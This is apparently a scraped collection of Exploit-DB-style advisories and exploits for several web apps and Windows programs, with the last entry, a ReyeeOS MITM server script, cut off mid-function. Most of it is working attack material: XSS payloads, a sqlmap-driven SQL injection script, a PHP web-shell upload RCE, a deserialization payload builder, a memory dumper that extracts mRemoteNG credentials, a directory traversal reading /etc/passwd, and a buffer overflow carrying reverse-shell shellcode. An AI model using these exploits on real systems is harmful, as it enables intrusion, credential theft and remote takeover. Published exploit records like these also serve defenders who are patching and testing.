ISHACK AI BOT

# Exploit Title: Perch v3.2 - Persistent Cross Site Scripting (XSS) # Google Dork: N/A # Date: 23-July-2023 # Exploit Author: Dinesh Mohanty # Vendor Homepage: https://grabaperch.com/ # Software Link: https://grabaperch.com/download # Version: v3.2 # Tested on: Windows # CVE : Requested # Description: Stored Cross Site Scripting (Stored XSS) Vulnerability is found in the file upload functionally under the create asset section. #Steps to Reproduce User needs to login into the application and needs to follow below steps: 1. Login into the application 2. From the left side menu go to Assets (http://URL/perch/core/apps/assets/) 3. Click on "Add assets" and fill all other details (Please note not all the text fields are vulnerable to XSS as they have output encoding) 4. Create the SVG file with below contents say xss.svg <?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/> <script type="text/javascript"> alert("XSS"); </script> </svg> 4. In the File upload section upload the above SVG file and submit 5. Now go to above SVG directly say the file is xss.svg 6. go to svg file (http://URL/perch/resources/xss.svg) or you can view all Assets and view the image 7. One can see that we got an XSS alert.

# Exploit Title: mooDating 1.2 - Reflected Cross-site scripting (XSS) # Exploit Author: CraCkEr aka (skalvin) # Date: 22/07/2023 # Vendor: mooSocial # Vendor Homepage: https://moodatingscript.com/ # Software Link: https://demo.moodatingscript.com/home # Version: 1.2 # Tested on: Windows 10 Pro # Impact: Manipulate the content of the site # CVE: CVE-2023-3849, CVE-2023-3848, CVE-2023-3847, CVE-2023-3846, CVE-2023-3843, CVE-2023-3845, CVE-2023-3844 ## Greetings The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka CryptoJob (Twitter) twitter.com/0x0CryptoJob ## Description The attacker can send to victim a link containing a malicious URL in an email or instant message can perform a wide variety of actions, such as stealing the victim's session token or login credentials Path: /matchmakings/question URL parameter is vulnerable to RXSS https://website/matchmakings/questiontmili%22%3e%3cimg%20src%3da%20onerror%3dalert(1)%3ew71ch?number= https://website/matchmakings/question[XSS]?number= Path: /friends URL parameter is vulnerable to RXSS https://website/friendsslty3%22%3e%3cimg%20src%3da%20onerror%3dalert(1)%3er5c3m/ajax_invite?mode=model https://website/friends[XSS]/ajax_invite?mode=model Path: /friends/ajax_invite URL parameter is vulnerable to RXSS https://website/friends/ajax_invitej7hrg%22%3e%3cimg%20src%3da%20onerror%3dalert(1)%3ef26v4?mode=model https://website/friends/ajax_invite[XSS]?mode=model Path: /pages URL parameter is vulnerable to RXSS https://website/pagesi3efi%22%3e%3cimg%20src%3da%20onerror%3dalert(1)%3ebdk84/no-permission-role?access_token&=redirect_url=aHR0cHM6Ly9kZW1vLm1vb2RhdGluZ3NjcmlwdC5jb20vbWVldF9tZS9pbmRleC9tZWV0X21l https://website/pages[XSS]/no-permission-role?access_token&=redirect_url=aHR0cHM6Ly9kZW1vLm1vb2RhdGluZ3NjcmlwdC5jb20vbWVldF9tZS9pbmRleC9tZWV0X21l Path: /users URL parameter is vulnerable to RXSS https://website/userszzjpp%22%3e%3cimg%20src%3da%20onerror%3dalert(1)%3eaycfc/view/108?tab=activity https://website/user[XSS]/view/108?tab=activity Path: /users/view URL parameter is vulnerable to RXSS https://website/users/viewi1omd%22%3e%3cimg%20src%3da%20onerror%3dalert(1)%3el43yn/108?tab=activity https://website/users/view[XSS]/108?tab=activity Path: /find-a-match URL parameter is vulnerable to RXSS https://website/find-a-matchpksyk%22%3e%3cimg%20src%3da%20onerror%3dalert(1)%3es9a64?session_popularity=&interest=0&show_search_form=1&gender=2&from_age=18&to_age=45&country_id=1&state_id=5&city_id=&advanced=0 https://website/find-a-match[XSS]?session_popularity=&interest=0&show_search_form=1&gender=2&from_age=18&to_age=45&country_id=1&state_id=5&city_id=&advanced=0 [XSS Payload]: pksyk"><img src=a onerror=alert(1)>s9a6 [-] Done

# Exploit Title: Joomla HikaShop 4.7.4 - Reflected XSS # Exploit Author: CraCkEr # Date: 24/07/2023 # Vendor: Hikari Software Team # Vendor Homepage: https://www.hikashop.com/ # Software Link: https://demo.hikashop.com/index.php/en/ # Joomla Extension Link: https://extensions.joomla.org/extension/e-commerce/shopping-cart/hikashop/ # Version: 4.7.4 # Tested on: Windows 10 Pro # Impact: Manipulate the content of the site ## Greetings The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka CryptoJob (Twitter) twitter.com/0x0CryptoJob ## Description The attacker can send to victim a link containing a malicious URL in an email or instant message can perform a wide variety of actions, such as stealing the victim's session token or login credentials Path: /index.php GET parameter 'from_option' is vulnerable to RXSS https://website/index.php?option=com_hikashop&ctrl=product&task=filter&tmpl=raw&filter=1&module_id=102&cid=2&from_option=[XSS]&from_ctrl=product&from_task=listing&from_itemid=103 Path: /index.php GET parameter 'from_ctrl' is vulnerable to RXSS https://demo.hikashop.com/index.php?option=com_hikashop&ctrl=product&task=filter&tmpl=raw&filter=1&module_id=102&cid=2&from_option=com_hikashop&from_ctrl=[XSS]&from_task=listing&from_itemid=103 Path: /index.php GET parameter 'from_task' is vulnerable to RXSS https://demo.hikashop.com/index.php?option=com_hikashop&ctrl=product&task=filter&tmpl=raw&filter=1&module_id=102&cid=2&from_option=com_hikashop&from_ctrl=product&from_task=[XSS]&from_itemid=103 Path: /index.php GET parameter 'from_itemid' is vulnerable to RXSS https://demo.hikashop.com/index.php?option=com_hikashop&ctrl=product&task=filter&tmpl=raw&filter=1&module_id=102&cid=2&from_option=com_hikashop&from_ctrl=product&from_task=listing&from_itemid=[XSS] [XSS Payload]: uhqum"onmouseover="alert(1)"style="position:absolute;width:100%;height:100%;top:0;left:0;"wcn46 [-] Done

#Exploit Title: October CMS v3.4.4 - Stored Cross-Site Scripting (XSS) (Authenticated) #Date: 29 June 2023 #Exploit Author: Okan Kurtulus #Vendor Homepage: https://octobercms.com #Version: v3.4.4 #Tested on: Ubuntu 22.04 #CVE : N/A # Proof of Concept: 1– Install the system through the website and log in with any user with file upload authority. 2– Select "Media" in the top menu. Prepare an SVG file using the payload below. 3– Upload the SVG file and call the relevant file from the directory it is in. XSS will be triggered. #Stored XSS Payload: <?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/> <script type="text/javascript"> alert(1); </script> </svg>

# Exploit Title: Joomla VirtueMart Shopping-Cart 4.0.12 - Reflected XSS # Exploit Author: CraCkEr # Date: 24/07/2023 # Vendor: VirtueMart Team # Vendor Homepage: https://www.virtuemart.net/ # Software Link: https://demo.virtuemart.net/ # Joomla Extension Link: https://extensions.joomla.org/extension/e-commerce/shopping-cart/virtuemart/ # Version: 4.0.12 # Tested on: Windows 10 Pro # Impact: Manipulate the content of the site ## Greetings The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka CryptoJob (Twitter) twitter.com/0x0CryptoJob ## Description The attacker can send to victim a link containing a malicious URL in an email or instant message can perform a wide variety of actions, such as stealing the victim's session token or login credentials Path: /product-variants GET parameter 'keyword' is vulnerable to RXSS https://website/product-variants?keyword=[XSS]&view=category&option=com_virtuemart&virtuemart_category_id=11&Itemid=925 [XSS Payload]: uk9ni"><script>alert(1)</script>a6di2 [-] Done

#!/usr/bin/python3 # Exploit Title: WordPress Plugin AN_Gradebook <= 5.0.1 - Subscriber+ SQLi # Date: 2023-07-26 # Exploit Author: Lukas Kinneberg # Github: https://github.com/lukinneberg/CVE-2023-2636 # Vendor Homepage: https://wordpress.org/plugins/an-gradebook/ # Software Link: https://github.com/lukinneberg/CVE-2023-2636/blob/main/an-gradebook.7z # Tested on: WordPress 6.2.2 # CVE: CVE-2023-2636 from datetime import datetime import os import requests import json # User Input: target_ip = 'CHANGE_THIS' target_port = '80' username = 'hacker' password = 'hacker' banner = ''' ____ ____ ____ ____ ____ ____ ____ ____ ____ ____ ____ ____ ____ ||C |||V |||E |||- |||2 |||0 |||2 |||3 |||- |||2 |||6 |||3 |||6 || ||__|||__|||__|||__|||__|||__|||__|||__|||__|||__|||__|||__|||__|| |/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\| Exploit Author: Lukas Kinneberg ''' print(banner) print('[*] Starting Exploit at: ' + str(datetime.now().strftime('%H:%M:%S'))) # Authentication: session = requests.Session() auth_url = 'http://' + target_ip + ':' + target_port + '/wp-login.php' check = session.get(auth_url) # Header: header = { 'Host': target_ip, 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'Accept-Language': 'de,en-US;q=0.7,en;q=0.3', 'Accept-Encoding': 'gzip, deflate', 'Content-Type': 'application/x-www-form-urlencoded', 'Origin': 'http://' + target_ip, 'Connection': 'close', 'Upgrade-Insecure-Requests': '1' } # Body: body = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'testcookie': '1' } auth = session.post(auth_url, headers=header, data=body) # SQL-Injection (Exploit): # Generate payload for sqlmap cookies_session = session.cookies.get_dict() cookie = json.dumps(cookies_session) cookie = cookie.replace('"}','') cookie = cookie.replace('{"', '') cookie = cookie.replace('"', '') cookie = cookie.replace(" ", '') cookie = cookie.replace(":", '=') cookie = cookie.replace(',', '; ') print('[*] Payload for SQL-Injection:') # Enter the URL path of the course after the target_port below exploitcode_url = r'sqlmap -u "http://' + target_ip + ':' + target_port + r'/wp-admin/admin-ajax.php?action=course&id=3" ' exploitcode_risk = '--level 2 --risk 2 ' exploitcode_cookie = '--cookie="' + cookie + '" ' # SQLMAP Printout print(' Sqlmap options:') print(' -a, --all Retrieve everything') print(' -b, --banner Retrieve DBMS banner') print(' --current-user Retrieve DBMS current user') print(' --current-db Retrieve DBMS current database') print(' --passwords Enumerate DBMS users password hashes') print(' --tables Enumerate DBMS database tables') print(' --columns Enumerate DBMS database table column') print(' --schema Enumerate DBMS schema') print(' --dump Dump DBMS database table entries') print(' --dump-all Dump all DBMS databases tables entries') retrieve_mode = input('Which sqlmap option should be used to retrieve your information? ') exploitcode = exploitcode_url + exploitcode_risk + exploitcode_cookie + retrieve_mode + ' -p id -v 0 --answers="follow=Y" --batch' os.system(exploitcode) print('Exploit finished at: ' + str(datetime.now().strftime('%H:%M:%S')))

# Exploit Title: GreenShot 1.2.10 - Insecure Deserialization Arbitrary Code Execution # Date: 26/07/2023 # Exploit Author: p4r4bellum # Vendor Homepage: https://getgreenshot.org # Software Link: https://getgreenshot.org/downloads/ # Version: 1.2.6.10 # Tested on: windows 10.0.19045 N/A build 19045 # CVE : CVE-2023-34634 # # GreenShot 1.2.10 and below is vulnerable to an insecure object deserialization in its custom *.greenshot format # A stream of .Net object is serialized and inscureley deserialized when a *.greenshot file is open with the software # On a default install the *.greenshot file extension is associated with the programm, so double-click on a*.greenshot file # will lead to arbitrary code execution # # Generate the payload. You need yserial.net to be installed on your machine. Grab it at https://github.com/pwntester/ysoserial.net ./ysoserial.exe -f BinaryFormatter -g WindowsIdentity -c "calc" --outputpath payload.bin -o raw #load the payload $payload = Get-Content .\payload.bin -Encoding Byte # retrieve the length of the payload $length = $payload.Length # load the required assembly to craft a PNG file Add-Type -AssemblyName System.Drawing # the following lines creates a png file with some text. Code borrowed from https://stackoverflow.com/questions/2067920/can-i-draw-create-an-image-with-a-given-text-with-powershell $filename = "$home\poc.greenshot" $bmp = new-object System.Drawing.Bitmap 250,61 $font = new-object System.Drawing.Font Consolas,24 $brushBg = [System.Drawing.Brushes]::Green $brushFg = [System.Drawing.Brushes]::Black $graphics = [System.Drawing.Graphics]::FromImage($bmp) $graphics.FillRectangle($brushBg,0,0,$bmp.Width,$bmp.Height) $graphics.DrawString('POC Greenshot',$font,$brushFg,10,10) $graphics.Dispose() $bmp.Save($filename) # append the payload to the PNG file $payload | Add-Content -Path $filename -Encoding Byte -NoNewline # append the length of the payload [System.BitConverter]::GetBytes([long]$length) | Add-Content -Path $filename -Encoding Byte -NoNewline # append the signature "Greenshot01.02" | Add-Content -path $filename -NoNewline -Encoding Ascii # launch greenshot. Calc.exe should be executed Invoke-Item $filename

# Exploit Title: copyparty v1.8.6 - Reflected Cross Site Scripting (XSS) # Date: 23/07/2023 # Exploit Author: Vartamtezidis Theodoros (@TheHackyDog) # Vendor Homepage: https://github.com/9001/copyparty/ # Software Link: https://github.com/9001/copyparty/releases/tag/v1.8.6 # Version: <=1.8.6 # Tested on: Debian Linux # CVE : CVE-2023-38501 #Description Copyparty is a portable file server. Versions prior to 1.8.6 are subject to a reflected cross-site scripting (XSS) Attack. Vulnerability that exists in the web interface of the application could allow an attacker to execute malicious javascript code by tricking users into accessing a malicious link. #POC https://localhost:3923/?k304=y%0D%0A%0D%0A%3Cimg+src%3Dcopyparty+onerror%3Dalert(1)%3E

# Exploit Title: copyparty 1.8.2 - Directory Traversal # Date: 14/07/2023 # Exploit Author: Vartamtzidis Theodoros (@TheHackyDog) # Vendor Homepage: https://github.com/9001/copyparty/ # Software Link: https://github.com/9001/copyparty/releases/tag/v1.8.2 # Version: <=1.8.2 # Tested on: Debian Linux # CVE : CVE-2023-37474 #Description Copyparty is a portable file server. Versions prior to 1.8.2 are subject to a path traversal vulnerability detected in the `.cpr` subfolder. The Path Traversal attack technique allows an attacker access to files, directories, and commands that reside outside the web document root directory. #POC curl -i -s -k -X GET 'http://127.0.0.1:3923/.cpr/%2Fetc%2Fpasswd'

# Exploit Title: mRemoteNG v1.77.3.1784-NB - Cleartext Storage of Sensitive Information in Memory # Google Dork: - # Date: 21.07.2023 # Exploit Author: Maximilian Barz # Vendor Homepage: https://mremoteng.org/ # Software Link: https://mremoteng.org/download # Version: mRemoteNG <= v1.77.3.1784-NB # Tested on: Windows 11 # CVE : CVE-2023-30367 /* Multi-Remote Next Generation Connection Manager (mRemoteNG) is free software that enables users to store and manage multi-protocol connection configurations to remotely connect to systems. mRemoteNG configuration files can be stored in an encrypted state on disk. mRemoteNG version <= v1.76.20 and <= 1.77.3-dev loads configuration files in plain text into memory (after decrypting them if necessary) at application start-up, even if no connection has been established yet. This allows attackers to access contents of configuration files in plain text through a memory dump and thus compromise user credentials when no custom password encryption key has been set. This also bypasses the connection configuration file encryption setting by dumping already decrypted configurations from memory. Full Exploit and mRemoteNG config file decryption + password bruteforce python script: https://github.com/S1lkys/CVE-2023-30367-mRemoteNG-password-dumper */ using System; using System.Collections; using System.Collections.Generic; using System.Diagnostics; using System.IO; using System.Reflection; using System.Runtime.InteropServices; using System.Text; using System.Text.RegularExpressions; namespace mRemoteNGDumper { public static class Program { public enum MINIDUMP_TYPE { MiniDumpWithFullMemory = 0x00000002 } [StructLayout(LayoutKind.Sequential, Pack = 4)] public struct MINIDUMP_EXCEPTION_INFORMATION { public uint ThreadId; public IntPtr ExceptionPointers; public int ClientPointers; } [DllImport("kernel32.dll")] static extern IntPtr OpenProcess(int dwDesiredAccess, bool bInheritHandle, int dwProcessId); [DllImport("Dbghelp.dll")] static extern bool MiniDumpWriteDump(IntPtr hProcess, uint ProcessId, SafeHandle hFile, MINIDUMP_TYPE DumpType, ref MINIDUMP_EXCEPTION_INFORMATION ExceptionParam, IntPtr UserStreamParam, IntPtr CallbackParam); static void Main(string[] args) { string input; bool configfound = false; StringBuilder filesb; StringBuilder linesb; List<string> configs = new List<string>(); Process[] localByName = Process.GetProcessesByName("mRemoteNG"); if (localByName.Length == 0) { Console.WriteLine("[-] No mRemoteNG process was found. Exiting"); System.Environment.Exit(1); } string assemblyPath = Assembly.GetEntryAssembly().Location; Console.WriteLine("[+] Creating a memory dump of mRemoteNG using PID {0}.", localByName[0].Id); string dumpFileName = assemblyPath + "_" + DateTime.Now.ToString("dd.MM.yyyy.HH.mm.ss") + ".dmp"; FileStream procdumpFileStream = File.Create(dumpFileName); MINIDUMP_EXCEPTION_INFORMATION info = new MINIDUMP_EXCEPTION_INFORMATION(); // A full memory dump is necessary in the case of a managed application, other wise no information // regarding the managed code will be available MINIDUMP_TYPE DumpType = MINIDUMP_TYPE.MiniDumpWithFullMemory; MiniDumpWriteDump(localByName[0].Handle, (uint)localByName[0].Id, procdumpFileStream.SafeFileHandle, DumpType, ref info, IntPtr.Zero, IntPtr.Zero); procdumpFileStream.Close(); filesb = new StringBuilder(); Console.WriteLine("[+] Searching for configuration files in memory dump."); using (StreamReader reader = new StreamReader(dumpFileName)) { while (reader.Peek() >= 0) { input = reader.ReadLine(); string pattern = @"(\<Node)(.*)(?=\/>)\/>"; Match m = Regex.Match(input, pattern, RegexOptions.IgnoreCase); if (m.Success) { configfound = true; foreach (string config in m.Value.Split('>')) { configs.Add(config); } } } reader.Close(); if (configfound) { string currentDir = System.IO.Directory.GetCurrentDirectory(); string dumpdir = currentDir + "/dump"; if (!Directory.Exists(dumpdir)) { Directory.CreateDirectory(dumpdir); } string savefilepath; for (int i =0; i < configs.Count;i++) { if (!string.IsNullOrEmpty(configs[i])) { savefilepath = currentDir + "\\dump\\extracted_Configfile_mRemoteNG_" + i+"_" + DateTime.Now.ToString("dd.MM.yyyy.HH.mm") + "_confCons.xml"; Console.WriteLine("[+] Saving extracted configuration file to: " + savefilepath); using (StreamWriter writer = new StreamWriter(savefilepath)) { writer.Write(configs[i]+'>'); writer.Close(); } } } Console.WriteLine("[+] Done!"); Console.WriteLine("[+] Deleting memorydump file!"); File.Delete(dumpFileName); Console.WriteLine("[+] To decrypt mRemoteNG configuration files and get passwords in cleartext, execute: mremoteng_decrypt.py\r\n Example: python3 mremoteng_decrypt.py -rf \""+ currentDir + "\\dump\\extracted_Configfile_mRemoteNG_0_" + DateTime.Now.ToString("dd.MM.yyyy.HH.mm") + "_confCons.xml\"" ); } else { Console.WriteLine("[-] No configuration file found in memorydump. Exiting"); Console.WriteLine("[+] Deleting memorydump file!"); File.Delete(dumpFileName); } } } } }

# Exploit Title: Joomla Solidres 2.13.3 - Reflected XSS # Exploit Author: CraCkEr # Date: 28/07/2023 # Vendor: Solidres Team # Vendor Homepage: http://solidres.com/ # Software Link: https://extensions.joomla.org/extension/vertical-markets/booking-a-reservations/solidres/ # Demo: http://demo.solidres.com/joomla # Version: 2.13.3 # Tested on: Windows 10 Pro # Impact: Manipulate the content of the site ## Greetings The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka CryptoJob (Twitter) twitter.com/0x0CryptoJob ## Description The attacker can send to victim a link containing a malicious URL in an email or instant message can perform a wide variety of actions, such as stealing the victim's session token or login credentials GET parameter 'show' is vulnerable to XSS GET parameter 'reviews' is vulnerable to XSS GET parameter 'type_id' is vulnerable to XSS GET parameter 'distance' is vulnerable to XSS GET parameter 'facilities' is vulnerable to XSS GET parameter 'categories' is vulnerable to XSS GET parameter 'prices' is vulnerable to XSS GET parameter 'location' is vulnerable to XSS GET parameter 'Itemid' is vulnerable to XSS https://website/joomla/greenery_hub/index.php/en/hotels/reservations?location=d2tff&task=hub.search&ordering=score&direction=desc&type_id=0&show=[XSS] https://website/joomla/greenery_hub/index.php?option=com_solidres&task=hub.updateFilter&location=italy&checkin=27-07-2023&checkout=28-07-2023&option=com_solidres&Itemid=306&a0b5056f4a0135d4f5296839591a088a=1distance=0-11&distance=0-11&reviews=[XSS]&facilities=18& https://website/joomla/greenery_hub/index.php/en/hotels/reservations?location=d2tff&task=hub.search&ordering=score&direction=desc&type_id=[XSS] https://website/joomla/greenery_hub/index.php/en/hotels/reservations?location=italy&checkin=27-07-2023&checkout=28-07-2023&option=com_solidres&task=hub.search&Itemid=306&a0b5056f4a0135d4f5296839591a088a=1distance=0-11&distance=[XSS]&facilities=14 https://website/joomla/greenery_hub/index.php/en/hotels/reservations?location=italy&checkin=27-07-2023&checkout=28-07-2023&option=com_solidres&task=hub.search&Itemid=306&a0b5056f4a0135d4f5296839591a088a=1distance=0-11&distance=0-11&facilities=[XSS] https://website/joomla/greenery_hub/index.php/en/hotels/reservations?location=italy&checkin=27-07-2023&checkout=28-07-2023&option=com_solidres&task=hub.search&Itemid=306&a0b5056f4a0135d4f5296839591a088a=1distance=0-25&distance=0-25&categories=[XSS] https://website/joomla/greenery_hub/index.php?option=com_solidres&task=hub.updateFilter&location=d2tff&ordering=distance&direction=asc&prices=[XSS] https://website/joomla/greenery_hub/index.php/en/hotels/reservations?location=[XSS]&task=hub.search&ordering=score&direction=desc&type_id=11 https://website/joomla/greenery_hub/index.php/en/hotels/reservations?location=italy&checkin=27-07-2023&checkout=28-07-2023&option=com_solidres&task=hub.search&Itemid=[XSS]&a0b5056f4a0135d4f5296839591a088a=1distance=0-11&distance=0-11&facilities=14 [-] Done

# Exploit Title: Joomla iProperty Real Estate 4.1.1 - Reflected XSS # Exploit Author: CraCkEr # Date: 29/07/2023 # Vendor: The Thinkery LLC # Vendor Homepage: http://thethinkery.net # Software Link: https://extensions.joomla.org/extension/vertical-markets/real-estate/iproperty/ # Demo: https://iproperty.thethinkery.net/ # Version: 4.1.1 # Tested on: Windows 10 Pro # Impact: Manipulate the content of the site ## Greetings The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka CryptoJob (Twitter) twitter.com/0x0CryptoJob ## Description The attacker can send to victim a link containing a malicious URL in an email or instant message can perform a wide variety of actions, such as stealing the victim's session token or login credentials Path: /iproperty/property-views/all-properties-with-map GET parameter 'filter_keyword' is vulnerable to XSS https://website/iproperty/property-views/all-properties-with-map?filter_keyword=[XSS]&option=com_iproperty&view=allproperties&ipquicksearch=1 XSS Payload: pihil"onmouseover="alert(1)"style="position:absolute;width:100%;height:100%;top:0;left:0;"f63m4 [-] Done

# Exploit Title: Uvdesk v1.1.3 - File Upload Remote Code Execution (RCE) (Authenticated) # Date: 28/07/2023 # Exploit Author: Daniel Barros (@cupc4k3d) - Hakai Offensive Security # Vendor Homepage: https://www.uvdesk.com # Software Link: https://github.com/uvdesk/community-skeleton # Version: 1.1.3 # Example: python3 CVE-2023-39147.py -u "http://$ip:8000/" -c "whoami" # CVE : CVE-2023-39147 # Tested on: Ubuntu 20.04.6 import requests import argparse def get_args(): parser = argparse.ArgumentParser() parser.add_argument('-u', '--url', required=True, action='store', help='Target url') parser.add_argument('-c', '--command', required=True, action='store', help='Command to execute') my_args = parser.parse_args() return my_args def main(): args = get_args() base_url = args.url command = args.command uploaded_file = "shell.php" url_cmd = base_url + "//assets/knowledgebase/shell.php?cmd=" + command # Edit your credentials here login_data = { "_username": "[email protected]", "_password": "passwd", "_remember_me": "off" } files = { "name": (None, "pwn"), "description": (None, "xxt"), "visibility": (None, "public"), "solutionImage": (uploaded_file, "<?php system($_GET['cmd']); ?>", "image/jpg") } s = requests.session() # Login s.post(base_url + "/en/member/login", data=login_data) # Upload upload_response = s.post(base_url + "/en/member/knowledgebase/folders/new", files=files) # Execute command cmd = s.get(url_cmd) print(cmd.text) if __name__ == "__main__": main()

# Exploit Title: General Device Manager 2.5.2.2 - Buffer Overflow (SEH) # Date: 30.07.2023 # Software Link: https://download.xm030.cn/d/MDAwMDA2NTQ= # Software Link 2: https://www.maxiguvenlik.com/uploads/importfiles/General_DeviceManager.zip # Exploit Author: Ahmet Ümit BAYRAM # Tested Version: 2.5.2.2 # Tested on: Windows 10 64bit # 1.- Run python code : exploit.py # 2.- Open pwned.txt and copy all content to clipboard # 3.- Open Device Manage and press Add Device # 4.- Paste the content of pwned.txt into the 'IP Address' # 5.- Click 'OK' # 6.- nc.exe local IP Port 1337 and you will have a bind shell # 7.- R.I.P. Condor <3 import struct offset = b"A" * 1308 nseh = b"\xEB\x06\x90\x90" # jmp short seh = struct.pack('<I', 0x10081827) # 0x10081827 : pop ebx # pop esi # ret | ascii {PAGE_EXECUTE_READ} [NetSDK.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v4.0.8.66 (C:\Program Files (x86)\DeviceManage\NetSDK.dll) nops = b"\x90" * 32 #shellcode: msfvenom -p windows/shell_reverse_tcp LHOST=127.0.0.1 LPORT=1337 EXITFUNC=thread -a x86 --platform windows -b "\x00\x0a\x0d" -f python --var-name shellcode shellcode = b"" shellcode += b"\xd9\xc6\xbb\xae\xc7\xed\x8e\xd9\x74\x24\xf4" shellcode += b"\x5a\x29\xc9\xb1\x52\x83\xea\xfc\x31\x5a\x13" shellcode += b"\x03\xf4\xd4\x0f\x7b\xf4\x33\x4d\x84\x04\xc4" shellcode += b"\x32\x0c\xe1\xf5\x72\x6a\x62\xa5\x42\xf8\x26" shellcode += b"\x4a\x28\xac\xd2\xd9\x5c\x79\xd5\x6a\xea\x5f" shellcode += b"\xd8\x6b\x47\xa3\x7b\xe8\x9a\xf0\x5b\xd1\x54" shellcode += b"\x05\x9a\x16\x88\xe4\xce\xcf\xc6\x5b\xfe\x64" shellcode += b"\x92\x67\x75\x36\x32\xe0\x6a\x8f\x35\xc1\x3d" shellcode += b"\x9b\x6f\xc1\xbc\x48\x04\x48\xa6\x8d\x21\x02" shellcode += b"\x5d\x65\xdd\x95\xb7\xb7\x1e\x39\xf6\x77\xed" shellcode += b"\x43\x3f\xbf\x0e\x36\x49\xc3\xb3\x41\x8e\xb9" shellcode += b"\x6f\xc7\x14\x19\xfb\x7f\xf0\x9b\x28\x19\x73" shellcode += b"\x97\x85\x6d\xdb\xb4\x18\xa1\x50\xc0\x91\x44" shellcode += b"\xb6\x40\xe1\x62\x12\x08\xb1\x0b\x03\xf4\x14" shellcode += b"\x33\x53\x57\xc8\x91\x18\x7a\x1d\xa8\x43\x13" shellcode += b"\xd2\x81\x7b\xe3\x7c\x91\x08\xd1\x23\x09\x86" shellcode += b"\x59\xab\x97\x51\x9d\x86\x60\xcd\x60\x29\x91" shellcode += b"\xc4\xa6\x7d\xc1\x7e\x0e\xfe\x8a\x7e\xaf\x2b" shellcode += b"\x1c\x2e\x1f\x84\xdd\x9e\xdf\x74\xb6\xf4\xef" shellcode += b"\xab\xa6\xf7\x25\xc4\x4d\x02\xae\x94\x91\x0c" shellcode += b"\x2f\x03\x90\x0c\x2a\xea\x1d\xea\x5e\x1c\x48" shellcode += b"\xa5\xf6\x85\xd1\x3d\x66\x49\xcc\x38\xa8\xc1" shellcode += b"\xe3\xbd\x67\x22\x89\xad\x10\xc2\xc4\x8f\xb7" shellcode += b"\xdd\xf2\xa7\x54\x4f\x99\x37\x12\x6c\x36\x60" shellcode += b"\x73\x42\x4f\xe4\x69\xfd\xf9\x1a\x70\x9b\xc2" shellcode += b"\x9e\xaf\x58\xcc\x1f\x3d\xe4\xea\x0f\xfb\xe5" shellcode += b"\xb6\x7b\x53\xb0\x60\xd5\x15\x6a\xc3\x8f\xcf" shellcode += b"\xc1\x8d\x47\x89\x29\x0e\x11\x96\x67\xf8\xfd" shellcode += b"\x27\xde\xbd\x02\x87\xb6\x49\x7b\xf5\x26\xb5" shellcode += b"\x56\xbd\x47\x54\x72\xc8\xef\xc1\x17\x71\x72" shellcode += b"\xf2\xc2\xb6\x8b\x71\xe6\x46\x68\x69\x83\x43" shellcode += b"\x34\x2d\x78\x3e\x25\xd8\x7e\xed\x46\xc9" final_payload = offset + nseh + seh + nops + shellcode # write the final payload to a file try: with open('pwned.txt', 'wb') as f: print("[+] Creating %s bytes evil payload..." %len(final_payload)) f.write(final_payload) f.close() print("[+] File created!") except: print("File cannot be created!")

# Exploit Title: ReyeeOS 1.204.1614 - MITM Remote Code Execution (RCE) # Google Dork: None # Date: July 31, 2023 # Exploit Author: Riyan Firmansyah of Seclab # Vendor Homepage: https://ruijienetworks.com # Software Link: https://www.ruijienetworks.com/support/documents/slide_EW1200G-PRO-Firmware-B11P204 # Version: ReyeeOS 1.204.1614; EW_3.0(1)B11P204, Release(10161400) # Tested on: Ruijie RG-EW1200, Ruijie RG-EW1200G PRO # CVE : None """ Summary ======= The Ruijie Reyee Cloud Web Controller allows the user to use a diagnostic tool which includes a ping check to ensure connection to the intended network, but the ip address input form is not validated properly and allows the user to perform OS command injection. In other side, Ruijie Reyee Cloud based Device will make polling request to Ruijie Reyee CWMP server to ask if there's any command from web controller need to be executed. After analyze the network capture that come from the device, the connection for pooling request to Ruijie Reyee CWMP server is unencrypted HTTP request. Because of unencrypted HTTP request that come from Ruijie Reyee Cloud based Device, attacker could make fake server using Man-in-The-Middle (MiTM) attack and send arbitrary commands to execute on the cloud based device that make CWMP request to fake server. Once the attacker have gained access, they can execute arbitrary commands on the system or application, potentially compromising sensitive data, installing malware, or taking control of the system. """ #!/usr/bin/env python3 # -*- coding: utf-8 -*- from html import escape, unescape import http.server import socketserver import io import time import re import argparse import gzip # command payload command = "uname -a" # change this to serve on a different port PORT = 8080 def cwmp_inform(soap): cwmp_id = re.search(r"(?:<cwmp:ID.*?>)(.*?)(?:<\/cwmp:ID>)", soap).group(1) product_class = re.search(r"(?:<ProductClass.*?>)(.*?)(?:<\/ProductClass>)", soap).group(1) serial_number = re.search(r"(?:<SerialNumber.*?>)(.*?)(?:<\/SerialNumber>)", soap).group(1) result = {'cwmp_id': cwmp_id, 'product_class': product_class, 'serial_number': serial_number, 'parameters': {}} parameters = re.findall(r"(?:<P>)(.*?)(?:<\/P>)", soap) for parameter in parameters: parameter_name = re.search(r"(?:<N>)(.*?)(?:<\/N>)", parameter).group(1) parameter_value = re.search(r"(?:<V>)(.*?)(?:<\/V>)", parameter).group(1) 